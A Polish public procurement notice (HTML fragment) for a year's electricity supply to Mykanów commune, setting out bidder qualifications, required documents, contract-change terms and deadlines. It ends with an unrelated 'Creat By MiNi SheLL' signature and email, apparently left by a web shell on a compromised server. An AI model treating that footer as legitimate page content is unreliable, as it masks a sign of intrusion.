sprzedaż energii rozpocznie się<br/>w chwili przyjęcia umowy do realizacji przez OSD,<br/>c) dokonania bilansowania handlowego dla energii elektrycznej Zamawiającego,<br/>d) prowadzenia ewidencji wpłat należności zapewniającej poprawność rozliczeń,<br/>e) przyjmowania od Zamawiającego wniosków i reklamacji,<br/>f) przekazywania Zamawiającemu istotnych informacji dotyczących realizacji umowy, i)<br/>rozliczenia za pobraną energię elektryczną odbywać się będą na podstawie wskazań<br/>zainstalowanych układów pomiarowych OSD.<br/>Wszystkie wymagania określone powyżej stanowią wymagania minimalne, a ich spełnienie<br/>jest obligatoryjne. Niespełnienie ww. wymagań minimalnych skutkować będzie odrzuceniem<br/>oferty jako niezgodnej z warunkami zamówienia na podstawie art. 226 ust. 1 pkt 5 ustawy<br/>Pzp </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">09310000-5 - Elektryczność</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja od do --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal"> od 2022-06-01 do 2023-05-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Wyłącznie kryterium ceny </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">100</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.1. zdolności do występowania w obrocie gospodarczym:<br/>Zamawiający uzna, że wykonawca spełnia warunek w zakresie zdolności do występowania w obrocie gospodarczym (art. 112 ust. 2 pkt 1 ustawy Pzp) jeżeli wykonawca prowadzący działalność gospodarczą lub zawodową jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w państwie<br/>członkowskim Unii Europejskiej, w którym posiadają siedzibę lub miejscezamieszkania.<br/>1.2. uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej.<br/>O realizację zamówienia mogą się ubiegać podmioty, które posiadają aktualnie obowiązującą koncesję na prowadzenie działalności gospodarczej w zakresie obrotu energią elektryczną, wydaną przez Prezesa Urzędu Regulacji Energetyki zgodnie z<br/>wymogami ustawy z dnia 10 kwietnia 1997 r. Prawo energetyczne (t.j. Dz. U. z 2021r. poz. 716, ze zm.) i ważną w okresie wykonywania zamówienia lub dokumentu potwierdzającego, że wykonawca jest wpisany do jednego z rejestrów zawodowych<br/>lub handlowych, prowadzonych w państwie członkowskim Unii Europejskiej, w którym wykonawca ma siedzibę lub miejsce zamieszkania oraz oraz posiadają zawartą umowę o świadczenie usług dystrybucji energii elektrycznej z Operatorem<br/>Systemu Dystrybucyjnego TAURON Dystrybucja S.A. działającym na terenie Częstochowy i gminy Mykanów <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Warunek zostanie spełniony, jeżeli Wykonawca w druku oferty przedstawi numer koncesji , datę jej wydania oraz okres ważności lub równoważnego dokumentu obowiązującego na terenie Unii Europejskiej potwierdzonego za zgodność z oryginałem.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Do oferty, w celu wstępnego wykazania spełniania warunków udziału w postępowaniu oraz braku podstaw do wykluczenia, Wykonawca zobowiązany jest dołączyć aktualne na dzień składania ofert:<br/>1) oświadczenie dotyczące przesłanek wykluczenia z postępowania ( oświadczenie należy wypełnić i podpisać przez osoby( osobę) uprawnioną - załącznik nr 2<br/>2) oświadczenie dotyczące spełniania warunków udziału w postępowaniu ( oświadczenie wypełnić i podpisać przez osoby(osobę) uprawniona – załącznik nr 3<br/>3) klauzula informacyjna RODO - oświadczenie składane na druku oferty<br/>4) Odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru (jeżeli dotyczy) - w celu potwierdzenia, że osoba działająca w imieniu wykonawcy jest umocowana do jego reprezentowania, sporządzone nie wcześniej niż 3 miesiące<br/>przed ich złożeniem. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast w/w dokumentów składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub<br/>miejsce zamieszkania,.<br/>5) pełnomocnictwo z art.58 ust.2 ustawy, – Pzp ( jeśli dotyczy)<br/>Wykonawcy ubiegający się wspólnie o udzielenie zamówienia przedkładają pełnomocnictwo do reprezentowania ich zgodnie z art.58 ust.2 ustawy Pzp. Pełnomocnictwo powinno być załączone do oferty w formie oryginału. Jeżeli dokument został sporządzony w postaci papierowej i opatrzony własnoręcznym<br/>podpisem, Wykonawca przekazuje cyfrowe odwzorowanie tego dokumentu opatrzone kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem osobistym poświadczającym zgodność odwzorowania z dokumentem w postaci<br/>papierowej. Dopuszcza się również przedłożenie elektronicznej kopii dokumentu poświadczonej za zgodność z oryginałem przez notariusza tj. podpisanej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem<br/>osobistym osoby posiadającej uprawnienia notariusza<br/>6) pełnomocnictwo dla osoby / osób podpisującej ofertę <br/>7) Wykaz rozwiązań równoważnych – ( jeśli dotyczy) wykonawca, który powołuje się na rozwiązania równoważne , jest zobowiązany wykazać, ze oferowane przez niego rozwiązanie spełnia wymagania określone przez zamawiającego. W takim przypadku<br/>wykonawca załącza do oferty wykaz rozwiązań równoważnych z jego opisem i normami. Dokument musi być złożony w formie elektronicznej opatrzonej kwalifikowanym podpisem elektronicznym lub podpisem zaufany lub podpisem<br/>osobistym osoby upoważnionej do reprezentacji<br/>8) zastrzeżenie tajemnicy przedsiębiorstwa – <br/>w art.18 ust.3 ustawy Pzp) wszystkim zainteresowanym. <br/>9) zobowiązanie podmiotu udostępniającego zasoby ( w przypadku, gdy wykonawca polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby) w takim<br/>przypadku należy również złożyć oświadczenie podmiotu nieudostępniającego o braku podstaw do wykluczenia oraz o spełnieniu warunków<br/>10) w przypadku składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia ( konsorcja, spółki cywilne), dokumenty lub oświadczenia potwierdzające brak podstaw do wykluczeniu oraz oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu składa każdy z wykonawców oddzielnie, również podmiot udostępniający swoje zasoby składa te dokumenty. Ponadto wykonawcy wspólnie ubiegający się (konsorcja, spółki cywilne) mają obowiązek złożyć zgodnie<br/>z art.117 ust.4 ustawy Pzp oświadczenie, z którego wynika, które roboty budowlane, dostawy lub usługi wykonują poszczególni z nich. . <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> w przypadku składania oferty przez wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia ( konsorcja, spółki cywilne), dokumenty lub oświadczenia<br/>potwierdzające brak podstaw do wykluczeniu oraz oświadczenie o spełnianiu<br/>warunków udziału w postępowaniu składa każdy z wykonawców oddzielnie, również<br/>podmiot udostępniający swoje zasoby składa te dokumenty. Ponadto wykonawcy wspólnie ubiegający się (konsorcja, spółki cywilne) mają obowiązek złożyć zgodnie<br/>z art.117 ust.4 ustawy Pzp oświadczenie, z którego wynika, które roboty<br/>budowlane, dostawy lub usługi wykonują poszczególni z nich. Oświadczenie<br/>należy złożyć wraz z ofertą opatrzone kwalifikowanym podpisem elektronicznym,<br/>podpisem zaufanym lub osobistym. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wszelkie zmiany wprowadzane do umowy wymagają obustronnej zgody oraz formy pisemnej pod<br/>rygorem nieważności. Zmiany umowy muszą być zgodne z treścią art. 454 i 455 Prawa zamówień<br/>publicznych.<br/>2. Strony ustalają, że postanowienia umowy mogą być zmienione w sytuacji:<br/>a) zmian spowodowanych siłą wyższą uniemożliwiających wykonanie przedmiotu Umowy, przy czym<br/>przez siłę wyższą Strony rozumieją zdarzenie o charakterze przypadkowym lub naturalnym, ale<br/>zawsze o charakterze zewnętrznym w stosunku do człowieka, zdarzenie niemożliwe (lub prawie<br/>niemożliwe) do przewidzenia, zdarzenie, którego skutkom nie można zapobiec, w szczególności<br/>działania sił przyrody (np. powodzie, trzęsienia ziemi, huragany), zaburzenia życia zbiorowego<br/>(działania wojenne, zamieszki wewnętrzne, strajk, epidemie), akty władzy państwowej (akty władzy<br/>ustawodawczej lub administracyjnej, które czynią niemożliwym wykonanie danego zobowiązania) –<br/>zmiany te mogą spowodować zmiany te mogą spowodować zmianę ilości punktów PPE, grupy<br/>taryfowej lub wartości zawartej Umowy,<br/>b) wystąpienia okoliczności, których Strony Umowy nie były w stanie przewidzieć, pomimo<br/>zachowania należytej staranności,<br/>c) wprowadzenia zmian przez ustawodawcę w zakresie stawek podatku od towarów i usług<br/>d) wprowadzenia zmian przez ustawodawcę w zakresie stawek podatku akcyzowego,<br/>e) zmiany podmiotu odpowiedzialnego za rozliczanie niezbilansowanej energii elektrycznej<br/>dostarczonej i pobranej z systemu,<br/>f) zmiany sposobu wykonania Przedmiotu Umowy w przypadku zmiany regulacji prawnych<br/>odnoszących się do praw i obowiązków Stron Umowy, wprowadzonych po zawarciu Umowy,<br/>wywołujących niezbędną potrzebę zmiany sposobu realizacji Umowy, w tym regulacji prawnych,<br/>na podstawie ustawy z dnia 2 marca 2020 r. o szczególnych rozwiązaniach związanych z<br/>zapobieganiem, przeciwdziałaniem i zwalczaniem COVID-19, innych chorób zakaźnych oraz<br/>wywołanych nimi sytuacji kryzysowych - zmiany te mogą spowodować zmianę ilości punktów<br/>PPE, grupy taryfowej lub wartości zawartej Umowy<br/>3. Zmiana postanowień Umowy może nastąpić tylko za zgodą obu jej Stron wyrażoną na piśmie, w formie<br/>aneksu do Umowy, sporządzonego przez Zamawiającego, pod rygorem nieważności takiej zmiany za<br/>wyjątkiem zmian wskazanych w ust. 2 lit f , które to zmiany następują automatycznie z dniem wejścia w<br/>życie zmienionych przepisów. 4. Strony dopuszczają również wprowadzenie zmian w zwartej umowie w przypadku:<br/>a) Konieczności poprawienia oczywistej omyłki pisarskiej;<br/>b) Zmiany osób reprezentujących Wykonawcę;<br/>c) Zmiany danych podmiotowych Wykonawcy lub Zamawiającego;<br/>d) W innych sytuacjach, których nie można było przewidzieć w chwili zawarcia niniejszej Umowy, a<br/>mających charakter zmian nieistotnych tzn. takich, o których wiedza na etapie postępowania o udzielenie<br/>zamówienia nie wpłynęłaby na krąg podmiotów ubiegających się o to zamówienie lub na wynik<br/>postępowania. zaistnienia niemożliwej do przewidzenia w momencie zawarcia umowy okoliczności<br/>prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, skutkującej<br/>brakiem możliwości należytego wykonania umowy,<br/>e) wyniknięcia rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie można<br/>usunąć w inny sposób a zmiana będzie umożliwiać usunięcie rozbieżności i doprecyzowanie umowy w<br/>celu jednoznacznej interpretacji jej zapisów przez Strony,<br/>f) gdy zmiany te są korzystne dla Zamawiającego,<br/>5. Wszystkie postanowienia stanowią katalog zmian, na które Zamawiający może wyrazić zgodę. Nie<br/>stanowią jednocześnie zobowiązania do wyrażenia takiej zgody<br/>6. Wszelkie sprawy sporne wynikłe z realizacji niniejszej umowy, Strony będą rozstrzygały polubownie.<br/>7. Strony ustalają, że w razie powstania sporu nierozstrzygniętego polubownie, do jego rozpatrzenia<br/>właściwy będzie Sąd w Częstochowie. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-04-22 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/mykanow/proceedings</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-04-22 11:10</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-05-21</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wszelkie dodatkowe informacje zawarte są w SWZ i załącznikach

Creat By MiNi SheLL
Email: jattceo@gmail.com